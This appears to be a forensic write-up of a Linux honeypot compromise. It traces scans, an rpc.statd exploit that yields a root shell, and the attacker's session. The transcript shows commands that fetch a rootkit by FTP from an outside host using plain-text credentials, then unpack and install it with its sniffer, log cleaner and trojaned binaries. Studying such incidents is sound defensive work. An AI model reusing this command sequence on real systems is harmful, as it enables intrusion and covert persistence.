Traffic related to 172.16.1.108 ** Time before attack 03/15-11:33:29 - first scan for running sunrpc, returning nothing, originating from 203.111.78.182, the machine was probably down at this moment. 03/15-15:35:55 - another scan for running sunrpc, again nothing found, originating from 211.180.229.190. Proabably the machine was not yet up. 03/15-19:34:07...19:34:08 - Strange connection to 216.168.224.69:43 (whois service), coming from 172.16.1.108. Apparently, this was legitimate traffic, caused by the machine owner (as there was no connection from outside at that moment). ** Here is the attack itself, coming from 211.185.125.124 03/16-03:21:23...16:45:21 - and yet another scan, taking almost QUARTER an hour, but at last, it found port 111 open; 03/16-03:21:24 - connection to portmapper, in order to find the port where rpc.statd is running 03/16-03:21:25...03:21:29 - the attack, successful - a shell was open on port 39168. 03/16-03:21:36 - connection to the shell (port 39168). More about this part is described below. 03/16-03:46:25 - the last activity performed by the attacker on this system 03/16-04:03:27 - last packet received from attackers machine. Transcript of attacker's session. This part describes the things attacker did when he connected to the port 39168, where a rootshell awaited him. His IP was 211.185.125.124 and the operating system was probably Linux. The TTL on incoming packets was 43, which suggests that the attacker was 21 hops away. 211.185.125.124:4450 -> 172.16.1.108:39168 <-> SYN/SYNACK/ACK /* These commands were sent by the exploit */ -> cd /; uname -a; id; <- Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown <- uid=0(root) gid=0(root) /* sleep of 12 minutes, the attacker was probably away his machine * * Now he is going to download the rootkit from home.ro. Connection * is opened to port 21 on home.ro (193.231.236.41). Most of the * information transferred through this connection is below, except * for SYST, TYPE I and PORT 172,16,1,108,4,3 commands. Finally, * the connection is terminated with RST packet. While getting the * file, another connection to (resp. 'from' if we want to be completely * correct) home.ro is opened (port 20). Home.ro also connected * to the compromised machine's auth service (identd). */ -> ftp -v ftp.home.ro <- Connected to ftp.home.ro. 220- <- 220- 220- H O M E . R O 220- 220- This server is for HOME.RO members only. 220- Go to http://www.home.ro/ to register. 220- 220- No anonymous access allowed. 220- 220- 220 ProFTPD 1.2.0rc3 Server (HOME.RO Members FTP) [193.231.236.41] -> soane <- Name (ftp.home.ro:root): 331 Password required for soane. <- Password: -> i2ttgcj1d <- 230 User soane logged in.. -> get lk.tgz <- Remote system type is UNIX. Using binary mode to transfer files local: lk.tgz remote: lk.tgz 200 PORT command successful. -> 150 Opening BINARY mode data connection for lk.tgz (520333 bytes). <- 226 Transfer complete.. /* Once again, 8 minutes of doing nothing, then installing the rootkit */ -> bye <- 520333 bytes received in 35.5 secs (14 Kbytes/sec) 421 Idle Time out (240 seconds): closing control connection. -> tar -zxvf lk.tgz <- last/ -> tar: Archive contains future timestamp 2002-02-08 07:08:13 last/ssh.last/pidfile last/install last/linsniffer last/cleaner last/inetd.conf last/lsattr last/services last/sense last/ssh_config last/ssh_host_key last/ssh_host_key.pub last/ssh_random_seed last/sshd_config last/sl2 last/last.cgi last/ps last/netstat last/ifconfig last/top last/logclear last/s -> last/mkfs <- cd last <- ./install -> ********* Instalarea Rootkitului A Pornit La Drum ********* and so on..... The rest of the messages can be found in the rootkit (lk.tgz/install) from SotM 15. /* * In the later phase of rootkit installation, two mails are sent. * First goes to bidi_damm@yahoo.com (sent using mta502.mail.yahoo.com) * The other one is not sent, because spf2.us3.outblaze.com doesn't * like the specified MAIL FROM: address (root@asdf1). * During this process, two connections had been made to the auth service * (identd) of the compromised machine. Originators of these connections * were two mentioned mail-servers. */ ACKFIN/ACK/ACKFIN/ACK